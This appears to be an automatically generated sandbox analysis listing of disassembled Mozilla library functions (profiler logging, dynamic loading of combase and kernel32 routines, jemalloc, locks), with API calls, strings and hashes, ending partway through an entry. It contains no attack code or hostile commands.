Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 1fa6ac6cc3b99301fd52b4769cc234e4b20995d3a730711e73ad2f1873cfb9fc
Instruction ID: c8372f1269c4bb199440d80db3c11242320109dd6ac60b9392f04aa9625dc923
Opcode Fuzzy Hash: 1fa6ac6cc3b99301fd52b4769cc234e4b20995d3a730711e73ad2f1873cfb9fc
Instruction Fuzzy Hash: CE01083660422D9FDB006F9AA40C7A67B78EB8F319F044017FE0573781C7760826C6A5

Function 6C271FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C271FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C271FFD
__Init_thread_footer.LIBCMT ref: 6C272011
FreeLibrary.KERNEL32 ref: 6C272059

Strings

combase.dll, xrefs: 6C271FD9
CoCreateInstance, xrefs: 6C271FF7

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 387ca31b62372060961b684623a5d4346ccf1cd52635efb90a64ced14db21571
Instruction ID: e90b435ef76f9374a23724a47385f3cac76e53cfb3b51d552bd1dee2563c646c
Opcode Fuzzy Hash: 387ca31b62372060961b684623a5d4346ccf1cd52635efb90a64ced14db21571
Instruction Fuzzy Hash: BF1129B5601209EBDF608F55E88DE9B3B79EB6E355F008029FD06B2680CB319940CE71

Function 6C270EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C29AB89: EnterCriticalSection.KERNEL32(6C2EE370,?,?,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284), ref: 6C29AB94
Part of subcall function 6C29AB89: LeaveCriticalSection.KERNEL32(6C2EE370,?,6C2634DE,6C2EF6CC,?,?,?,?,?,?,?,6C263284,?,?,6C2856F6), ref: 6C29ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C29D9F0,00000000), ref: 6C270F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C270F3C
__Init_thread_footer.LIBCMT ref: 6C270F50
FreeLibrary.KERNEL32(?,6C29D9F0,00000000), ref: 6C270F86

Strings

combase.dll, xrefs: 6C270F18
CoInitializeEx, xrefs: 6C270F36

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: e7617a2125e9b392a25e59da07151ed0c905f631a4f38ada05fb01397201d290
Instruction ID: df05732afb569d2366051fe2f8c4ce31d221c05e825d5439cbd27b2071869d81
Opcode Fuzzy Hash: e7617a2125e9b392a25e59da07151ed0c905f631a4f38ada05fb01397201d290
Instruction Fuzzy Hash: 8C119174601349DBEF50CF94D94CE5737B4E79E326F444229FD09A26C0DB31A405CA66

Function 6C2AF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2AF561

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

GetCurrentThreadId.KERNEL32 ref: 6C2AF577
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF585
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AF5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6C2AF499
[I %d/%d] profiler_resume, xrefs: 6C2AF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C2AF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C2AF3A8

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: b9dc71c7ad69017d49d87c8cfdb68141da66b6563e897723a1212f5b0f2c9a65
Instruction ID: 43bf4cc5551db9c62cca106310af518d9d20e97a70eb5519881a377564c85c3d
Opcode Fuzzy Hash: b9dc71c7ad69017d49d87c8cfdb68141da66b6563e897723a1212f5b0f2c9a65
Instruction Fuzzy Hash: D7F054766003089FDB406BA5984C96B7BBDEB8E39DF440415FF05A3781DBB64805C769

Function 6C2AF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C274A68), ref: 6C2A945E
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C2A9470
Part of subcall function 6C2A9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C2A9482
Part of subcall function 6C2A9420: __Init_thread_footer.LIBCMT ref: 6C2A949F

GetCurrentThreadId.KERNEL32 ref: 6C2AF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C2AF598), ref: 6C2AF621

Part of subcall function 6C2A94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C2A94EE
Part of subcall function 6C2A94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C2A9508

GetCurrentThreadId.KERNEL32 ref: 6C2AF637
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8,?,?,00000000,?,6C2AF598), ref: 6C2AF645
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8,?,?,00000000,?,6C2AF598), ref: 6C2AF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C2AF62A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 97a9e204733d54fc16f769d5f4a5bd70d795da66ecfbfe511ffe074e69263b17
Instruction ID: 5874811ae008be6a0975b650979c43c4e66f3010a6e451fb8cc8a39c0a5264d6
Opcode Fuzzy Hash: 97a9e204733d54fc16f769d5f4a5bd70d795da66ecfbfe511ffe074e69263b17
Instruction Fuzzy Hash: 77F05476200308AFDB406BA5984C96B7B7DEB8E39DF440415FE05A3791DBB64806C769

Function 6C270E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C270DF8), ref: 6C270E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C270EA1
__Init_thread_footer.LIBCMT ref: 6C270EB5
FreeLibrary.KERNEL32 ref: 6C270EC5

Strings

kernel32.dll, xrefs: 6C270E7D
GetProcessMitigationPolicy, xrefs: 6C270E9B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 21ebe282c21f93e52cf1ede6e25354d126d383d79bdd860778f8b51a9cd10f04
Instruction ID: 0d14b3160ffdf1c003ada85c6b5eec6ecfe9454ef2d5515c13415266a609eae2
Opcode Fuzzy Hash: 21ebe282c21f93e52cf1ede6e25354d126d383d79bdd860778f8b51a9cd10f04
Instruction Fuzzy Hash: DB014670B0038ACBDF908FEAE89CE4333B5E74E319F100525ED01A2BC0DB32A448CA25

Function 6C2A05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C29CFAE,?,?,?,6C2631A7), ref: 6C2A05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C29CFAE,?,?,?,6C2631A7), ref: 6C2A0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C2631A7), ref: 6C2A061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C2631A7), ref: 6C2A0627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C2A061B, 6C2A0625
<jemalloc>, xrefs: 6C2A05FA, 6C2A060F

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: a6c962d72cdf5f2d4765b3b4743b08f1d08820c79ef2e95a535367ec389ae35e
Instruction ID: 9a3581e697487f14d7404135e4027d9fecf97a1fbdb62fd93fce9ec7285d124a
Opcode Fuzzy Hash: a6c962d72cdf5f2d4765b3b4743b08f1d08820c79ef2e95a535367ec389ae35e
Instruction Fuzzy Hash: 64E08CE2A0111437F5142256AC8ADBB771CDBC6534F090039FD0D82301E94ABD1A92F6

Function 6C2705F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c39266439efa5a1d41ef00c5a18042327d186fa56bc9ec30fc81cac076dfadf
Instruction ID: ede5121681f266ec316159b6b843a7af3eddacf01bdb30f8e1811d7393cf5940
Opcode Fuzzy Hash: 8c39266439efa5a1d41ef00c5a18042327d186fa56bc9ec30fc81cac076dfadf
Instruction Fuzzy Hash: 42A14B70A00749CFDB24CF29C594A9AFBF1BF49304F54866ED849A7B41E731A949CFA0

Function 6C2A71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C2A6060: moz_xmalloc.MOZGLUE(00000024,ADDFFD99,00000000,?,00000000,?,?,6C2A5FCB,6C2A79A3), ref: 6C2A6078

free.MOZGLUE(-00000001), ref: 6C2A72F6
free.MOZGLUE(?), ref: 6C2A7311

Strings

Spliced unique strings, xrefs: 6C2A7340
Copied unique strings, xrefs: 6C2A7320
333s, xrefs: 6C2A7226
333s, xrefs: 6C2A731B

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 4bb3a74611a5f2dbe34dc86ed08d03315072e6f7b6afa790db41450757e1ff3d
Instruction ID: 6a22850de41607be13a4ddd16eff2bff22fa3e7ecfd60d47c9e71289f0c9bd8f
Opcode Fuzzy Hash: 4bb3a74611a5f2dbe34dc86ed08d03315072e6f7b6afa790db41450757e1ff3d
Instruction Fuzzy Hash: 11719371F0061D8FDB14CFA9C89069EB7F2AF84704F258129DC1AA7754DB31A947CB85

Function 6C2C14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2C14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C2C14E2
GetCurrentThreadId.KERNEL32 ref: 6C2C1546
InitializeConditionVariable.KERNEL32(?), ref: 6C2C15BA
free.MOZGLUE(?), ref: 6C2C16B4

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: ceebeafdffae9babd862f1b9bdf9d798f50dbca8c4503f8e7f66d18cf668e3b7
Instruction ID: 2769925911e553f4820aa8cceb991eb7729744a39dab4130d39ec1345832f1ef
Opcode Fuzzy Hash: ceebeafdffae9babd862f1b9bdf9d798f50dbca8c4503f8e7f66d18cf668e3b7
Instruction Fuzzy Hash: CA610571A007489BDB11CF24C885BDEB7B4BF89348F44861CED8A67751DB30E989CB92

Function 6C2BC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C2BC1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C2BC293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C2BC29E

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 8cb4c3ead0f46f75e5fc6d397fbf18d17cf60e85ed4dbc297fabbc7d491e1aff
Instruction ID: 616453fbcb54c40d54a673556e11b806ddf94dc2674e9b7445c449c47e355e50
Opcode Fuzzy Hash: 8cb4c3ead0f46f75e5fc6d397fbf18d17cf60e85ed4dbc297fabbc7d491e1aff
Instruction Fuzzy Hash: E861DB71A00619CFCB15DFA8C8849AEBBB5FF49729F194529EC12B7790C730A944CFA0

Function 6C2B9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2B9FDB
free.MOZGLUE(?,?), ref: 6C2B9FF0
free.MOZGLUE(?,?), ref: 6C2BA006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C2BA0BE
free.MOZGLUE(?,?), ref: 6C2BA0D5
free.MOZGLUE(?,?), ref: 6C2BA0EB

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: c9744ee0e3d89e558c2edd1b874df73eac3594ffb9a8de5647263958294e11e1
Instruction ID: 2ce88e1b61f90b1eee1881f5a68ef5337b49cf9a851ae6bf5f33ddce123ada2b
Opcode Fuzzy Hash: c9744ee0e3d89e558c2edd1b874df73eac3594ffb9a8de5647263958294e11e1
Instruction Fuzzy Hash: 2161C175809706DFC711CF18C48059AB3F5FF88369F144669EC99AB602EB32E986CBC1

Function 6C2BDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2BDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C2BD38A,?), ref: 6C2BDC6F
free.MOZGLUE(?,?,?,?,?,6C2BD38A,?), ref: 6C2BDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C2BD38A,?), ref: 6C2BDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C2BD38A,?), ref: 6C2BDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C2BD38A,?), ref: 6C2BDD4A

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 2dd89ff24f05090947cb3aaff1cc424fe748e0f13a477f0c777b2acaa370038a
Instruction ID: 7c80dcb82c6ea3542f9fb9e5db95fbaad3abcb14134646d7617dddbdbf826ffd
Opcode Fuzzy Hash: 2dd89ff24f05090947cb3aaff1cc424fe748e0f13a477f0c777b2acaa370038a
Instruction Fuzzy Hash: B04147B9A0070ACFCB40CF99C88499AB7B5FF88318B594569ED46ABB15D731FC04CB90

Function 6C2639A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE744,ew,l,00000000,ew,l,?,6C286112), ref: 6C2639AF
LeaveCriticalSection.KERNEL32(6C2EE744,?,6C286112), ref: 6C263A34
EnterCriticalSection.KERNEL32(6C2EE784,6C286112), ref: 6C263A4B
LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C263A5F

Strings

\.l, xrefs: 6C263A02
ew,l, xrefs: 6C2639A3, 6C2639A5

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \.l$ew,l
API String ID: 3168844106-4049756116
Opcode ID: 6b3b6cb17d9677628254be97f476dbb90a7c299dcc820bc1af8440b4d7cd3482
Instruction ID: b1314b7ef92b50781792a4c352aed2ea214de43d639934fcda5fb82e41f6be1e
Opcode Fuzzy Hash: 6b3b6cb17d9677628254be97f476dbb90a7c299dcc820bc1af8440b4d7cd3482
Instruction Fuzzy Hash: 5C21D67270270A8BC724DA67C459A26B3F1FF4A714769061DDD66A3F80D730AC45CB91

Function 6C2BC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C2BC82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C2BC842

Part of subcall function 6C2BCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C2DB5EB,00000000), ref: 6C2BCB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C2BC863
std::_Facet_Register.LIBCPMT ref: 6C2BC875

Part of subcall function 6C29B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C2DB636,?), ref: 6C29B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C2BC89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2BC8BC

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 637754ac602e693e75cfd6a7f32cacf8b1345e5ec55c9f555d5517e31456e591
Instruction ID: 9f1907e53982967e1487e5c55f3ccc6889627db24d56567477d7b4ff4fc56065
Opcode Fuzzy Hash: 637754ac602e693e75cfd6a7f32cacf8b1345e5ec55c9f555d5517e31456e591
Instruction Fuzzy Hash: 9B119075B003099BCB05EFA4D88C8AE7B74EF8D759B000129EE06B7780DB309908CBA5

Function 6C2AE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

